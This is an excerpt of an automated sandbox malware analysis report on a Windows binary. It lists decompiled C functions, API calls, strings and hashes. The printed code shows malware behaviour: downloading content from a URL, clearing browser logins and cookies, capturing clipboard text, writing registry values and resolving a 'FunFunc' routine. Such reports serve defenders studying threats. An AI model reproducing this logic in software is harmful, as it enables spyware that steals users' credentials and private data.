                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041343B
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B10,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041347F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416D58,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134BA
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B18,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134F5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 00413537
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?), ref: 00413562
                                                                                • SystemParametersInfoW.USER32 ref: 00413580
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                • API String ID: 3561681748-3576401099
                                                                                • Opcode ID: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                                                                • Instruction ID: 9cbbbfad74e45987a2bd5f73a37c109ae42610d4aeaf5eddbb83fc0603d2e269
                                                                                • Opcode Fuzzy Hash: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                                                                • Instruction Fuzzy Hash: 5041A772B50604BBEB1076A59C47FEF393ED780B50F51006AF9116B2C1D7AA8AC446EF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412553, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103networkfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
				void* _v8;
				char* _v12;
				void* _v16;
				void _v10016;
				void* _t35;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				unsigned int* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int _t74;
				char* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E00413ED0(0x271c, __ecx);
				_t55 = _a12;
				_a15 = _a15 & 0x00000000;
				_t98 = 0;
				 *_a8 = 0;
				 *_t55 = 0;
				_t35 = InternetOpenA("user", 1, 0, 0, 0);
				_v16 = _t35;
				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
				_v8 = _t36;
				if(_t36 != 0) {
					_a12 = 0;
					_a4 = 0;
					while(1) {
						_t10 =  &_a12; // 0x415664
						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
						if(_t42 != 0 && _a12 <= _t98) {
							break;
						}
						_t44 =  *_t55 + _a12;
						_push(_t44);
						L00413E84();
						_t57 =  *_t55;
						_t100 = _a4;
						_t58 = _t57 >> 2;
						_v12 = memcpy(_t44, _t100, _t58 << 2);
						_push(_a4);
						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
						_t101 =  &_v10016;
						_t64 = _a12 >> 2;
						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
						_t103 = _t103 + 0x30;
						L00413EBE();
						_a4 = _v12;
						 *_t55 =  *_t55 + _a12;
						_t98 = 0;
					}
					_push( *_t55);
					L00413E84();
					_t102 = _a4;
					 *_a8 = _t42;
					_t74 =  *_t55 >> 2;
					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
					_a15 = 1;
				}
				InternetCloseHandle(_v16);
				InternetCloseHandle(_v8);
				return _a15;
			}






















                                                                                0x0041255b
                                                                                0x00412564
                                                                                0x00412568
                                                                                0x0041256c
                                                                                0x00412573
                                                                                0x0041257a
                                                                                0x0041257c
                                                                                0x0041258d
                                                                                0x00412591
                                                                                0x00412599
                                                                                0x0041259c
                                                                                0x004125a3
                                                                                0x004125a6
                                                                                0x004125a9
                                                                                0x004125a9
                                                                                0x004125bc
                                                                                0x004125c4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004125cd
                                                                                0x004125d0
                                                                                0x004125d1
                                                                                0x004125d6
                                                                                0x004125d8
                                                                                0x004125df
                                                                                0x004125e6
                                                                                0x004125ec
                                                                                0x004125ef
                                                                                0x004125fa
                                                                                0x00412600
                                                                                0x0041260a
                                                                                0x0041260a
                                                                                0x0041260c
                                                                                0x00412615
                                                                                0x0041261b
                                                                                0x0041261e
                                                                                0x0041261e
                                                                                0x00412622
                                                                                0x00412624
                                                                                0x0041262a
                                                                                0x00412632
                                                                                0x00412638
                                                                                0x00412642
                                                                                0x00412644
                                                                                0x00412648
                                                                                0x00412652
                                                                                0x00412657
                                                                                0x0041265f

                                                                                APIs
                                                                                • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                                                                • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                                                                • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                                                                • InternetCloseHandle.WININET(?), ref: 00412652
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00412657
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                                                                • String ID: dVA$user
                                                                                • API String ID: 3314639739-756348157
                                                                                • Opcode ID: cfd10d6ce02fbabf37b8e84b7ecf1405ef66a66763e050899b4a81a70fff1a60
                                                                                • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                                                                • Opcode Fuzzy Hash: cfd10d6ce02fbabf37b8e84b7ecf1405ef66a66763e050899b4a81a70fff1a60
                                                                                • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004078BB, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 100sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 57%
                                                                                			E004078BB(void* __ecx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				void* _t40;
				void* _t44;

				_push(__ecx);
				 *0x41b9b8 = 1;
				Sleep( *0x41b9b4);
				_v5 = _v5 & 0x00000000;
				_v6 = _v6 & 0x00000000;
				_v7 = _v7 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t44 = 0;
				do {
					if(_v5 == 0) {
						L2:
						_v5 = E00407767();
					}
					if(_v6 == 0) {
						_v6 = E0040751B();
					}
					if(_v8 == 0) {
						_v8 = E0040728F();
					}
					if(_v7 == 0) {
						_v7 = E004071CF();
					}
					if(_t44 == 0) {
						_t44 = E0040710F();
					}
					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
						Sleep(0x1388);
					}
					if(_v5 == 0) {
						goto L2;
					}
				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E00407A90("\n[Cleared browsers logins and cookies.]\n");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
				if( *0x41b9b0 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					E0040B829(0x80000001, _t40, "FR", 1);
				}
				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
				return 0;
			}









                                                                                0x004078be
                                                                                0x004078cd
                                                                                0x004078d4
                                                                                0x004078d6
                                                                                0x004078da
                                                                                0x004078de
                                                                                0x004078e2
                                                                                0x004078e6
                                                                                0x004078e8
                                                                                0x004078ec
                                                                                0x004078ee
                                                                                0x004078f3
                                                                                0x004078f3
                                                                                0x004078fa
                                                                                0x00407901
                                                                                0x00407901
                                                                                0x00407908
                                                                                0x0040790f
                                                                                0x0040790f
                                                                                0x00407916
                                                                                0x0040791d
                                                                                0x0040791d
                                                                                0x00407922
                                                                                0x00407929
                                                                                0x00407929
                                                                                0x0040792f
                                                                                0x0040794c
                                                                                0x0040794c
                                                                                0x00407952
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407954
                                                                                0x0040797c
                                                                                0x00407982
                                                                                0x00407992
                                                                                0x004079a6
                                                                                0x004079ac
                                                                                0x004079bf
                                                                                0x004079cf
                                                                                0x004079db
                                                                                0x004079e9
                                                                                0x004079f5
                                                                                0x004079fa
                                                                                0x004079fd
                                                                                0x00407a09

                                                                                APIs
                                                                                • Sleep.KERNEL32 ref: 004078D4
                                                                                • Sleep.KERNEL32(00001388), ref: 0040794C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                                                                  • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,0001781A,00000000), ref: 00407779
                                                                                  • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                                                                  • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                                                                  • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                                                                  • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                                                                  • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                                                                Strings
                                                                                • [INFO], xrefs: 004079A1
                                                                                • Cleared browsers logins and cookies., xrefs: 0040798D
                                                                                • [Cleared browsers logins and cookies.], xrefs: 00407977
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                                                                • API String ID: 3797260644-945983296
                                                                                • Opcode ID: 0e61d76a432f7d136fcb36c9125ac27c4ea5ca7fe30263cf05620935d75329bb
                                                                                • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                                                                • Opcode Fuzzy Hash: 0e61d76a432f7d136fcb36c9125ac27c4ea5ca7fe30263cf05620935d75329bb
                                                                                • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407B8C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 29%
                                                                                			E00407B8C(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				char* _t29;
				void* _t38;
				intOrPtr _t49;
				void* _t50;
				void* _t53;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t49 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t53 = _t50 + 0x24;
				_t19 = _t49 - 0x42;
				if(_t19 == 0) {
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t21 = E00406DD9(_t20);
					__eflags = _t21;
					_pop(_t38);
					if(_t21 != 0) {
						_t24 = E00407033(_t21, "FunFunc");
						_push(_t38);
						 *0x41ba18 = _t24;
						 *0x41ba1c = 1;
						E00412855(_t38, _t53, 0x41bcf8);
						E004020C2(_a4, 0x6d, _t38);
					}
				} else {
					_t56 = _t19 == 1;
					if(_t19 == 1) {
						_t29 = E0040180C( &_v20, _t56, 0);
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						 *0x41ba18(atoi(_t29));
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}














                                                                                0x00407b96
                                                                                0x00407b9c
                                                                                0x00407bae
                                                                                0x00407bbe
                                                                                0x00407bcd
                                                                                0x00407bd7
                                                                                0x00407bde
                                                                                0x00407be1
                                                                                0x00407be4
                                                                                0x00407c12
                                                                                0x00407c19
                                                                                0x00407c20
                                                                                0x00407c25
                                                                                0x00407c27
                                                                                0x00407c28
                                                                                0x00407c30
                                                                                0x00407c35
                                                                                0x00407c37
                                                                                0x00407c44
                                                                                0x00407c4b
                                                                                0x00407c57
                                                                                0x00407c57
                                                                                0x00407be6
                                                                                0x00407be6
                                                                                0x00407be7
                                                                                0x00407bee
                                                                                0x00407bf5
                                                                                0x00407c03
                                                                                0x00407c0a
                                                                                0x00407be7
                                                                                0x00407c5f
                                                                                0x00407c67
                                                                                0x00407c70
                                                                                0x00407c7a

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407B96
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 00407BAE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00407BBE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407BCD
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BF5
                                                                                • atoi.MSVCRT ref: 00407BFC
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407C19
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006D,?,?,00000000,FunFunc), ref: 00407C67
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000,FunFunc), ref: 00407C70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                                                                • String ID: FunFunc
                                                                                • API String ID: 2980839617-81400306
                                                                                • Opcode ID: 7ca6af520bbac52e49158eadb91d2fa1d859985617ee98aa7f2f949104987feb
                                                                                • Instruction ID: 99ba8aa056b8c4f8b9d909233289e7e9d1b022cfe78e0840cace3255d8d2923c
                                                                                • Opcode Fuzzy Hash: 7ca6af520bbac52e49158eadb91d2fa1d859985617ee98aa7f2f949104987feb
                                                                                • Instruction Fuzzy Hash: 1A21A271A042099BCB04FBB5EC1A9EE3768EF44344F00403AF512E71E0EF789540CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406C35, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 31%
                                                                                			E00406C35(void* __ecx) {
				char _v5;
				char _v24;
				char _v40;
				char* _t13;
				void* _t18;
				void* _t34;

				_t18 = __ecx;
				if(( *0x41b8f8 & 0x00000001) == 0) {
					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(E00406CF4);
				}
				E00406BEF(_t18,  &_v24);
				_t13 =  &_v24;
				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
				if(_t13 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
					_t13 =  &_v24;
					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
					if(_t13 != 0) {
						L00414176();
						L00414170();
						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t13;
			}









                                                                                0x00406c45
                                                                                0x00406c4c
                                                                                0x00406c4e
                                                                                0x00406c5b
                                                                                0x00406c66
                                                                                0x00406c6b
                                                                                0x00406c72
                                                                                0x00406c7c
                                                                                0x00406c81
                                                                                0x00406c8b
                                                                                0x00406c93
                                                                                0x00406c99
                                                                                0x00406ca2
                                                                                0x00406cac
                                                                                0x00406cc4
                                                                                0x00406cce
                                                                                0x00406cd8
                                                                                0x00406ce0
                                                                                0x00406ce0
                                                                                0x00406cac
                                                                                0x00406ce9
                                                                                0x00406cf3

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C5B
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B8E8,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C81
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,00405AF6), ref: 00406C93
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664,?,?,?,00405AF6), ref: 00406CA2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[Following text has been copied to clipboard:],0041B8E8,[End of clipboard text]), ref: 00406CC4
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text]), ref: 00406CCE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text]), ref: 00406CE0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00405AF6), ref: 00406CE9
                                                                                Strings
                                                                                • [Following text has been copied to clipboard:], xrefs: 00406CBE
                                                                                • [End of clipboard text], xrefs: 00406CB8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                                                                • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                                                                • API String ID: 1191203583-3441917614
                                                                                • Opcode ID: d45c7064f6117a9dd88d4012a8149be2358ef0f2c0164467ff371dd0e6a57b07
                                                                                • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                                                                • Opcode Fuzzy Hash: d45c7064f6117a9dd88d4012a8149be2358ef0f2c0164467ff371dd0e6a57b07
                                                                                • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411A24, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                                                                  • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                                                                  • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
